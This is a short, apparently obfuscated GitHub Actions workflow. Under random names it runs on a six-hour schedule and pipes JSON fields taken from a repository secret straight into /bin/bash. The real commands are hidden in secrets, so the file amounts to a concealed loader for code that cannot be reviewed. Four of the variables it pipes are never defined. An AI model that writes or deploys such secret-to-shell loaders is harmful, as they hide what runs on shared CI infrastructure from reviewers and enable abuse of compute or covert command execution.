name: gongnvzz
on:
  workflow_dispatch:
  schedule:
    - cron: '52 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gongnvzz
        env:
          fexmn29: ${{ secrets.fexmn29 }}
        run: |
          echo $fexmn29 | jq -r .usn1091 | /bin/bash
          echo $tsaw7 | jq -r .gazjd5890 | /bin/bash
          echo $z14 | jq -r .wbm05 | /bin/bash
          echo $yxs5 | jq -r .g66555 | /bin/bash
          echo $oyv09 | jq -r .h406 | /bin/bash

